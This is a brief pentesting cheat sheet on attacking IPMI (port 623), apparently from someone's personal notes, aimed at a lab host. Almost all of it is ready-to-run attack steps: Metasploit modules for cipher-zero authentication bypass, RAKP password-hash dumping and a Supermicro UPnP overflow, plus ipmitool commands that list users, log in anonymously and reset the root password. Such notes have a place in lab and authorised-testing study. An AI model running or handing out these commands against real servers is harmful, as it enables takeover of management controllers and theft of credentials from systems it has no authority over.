623 ) IPMI
Enumerations
## ------------------| Version Detection
use auxiliary/scanner/ipmi/ipmi_version
Vulnerabilities
## ------------------| Change password for root user
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U root -P root user set password 2 newpassword
## ------------------| IPMI Authentication Bypass via Cipher 0
use auxiliary/scanner/ipmi/ipmi_cipher_zero
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U root -P root user list #C 0 to dump a list of users.
## ------------------| IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval
use auxiliary/scanner/ipmi/ipmi_dumphashes
set OUTPUT_HASHCAT_FILE cat-hash
set OUTPUT_JOHN_FILE john-hash
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U root -P root user list
## ------------------| IPMI Anonymous Authentication
ipmitool -I lanplus -H 10.10.11.124 -U '' -P '' user list
## ------------------| Supermicro IPMI UPnP
use exploit/multi/upnp/libupnp_ssdp_overflow
Last updated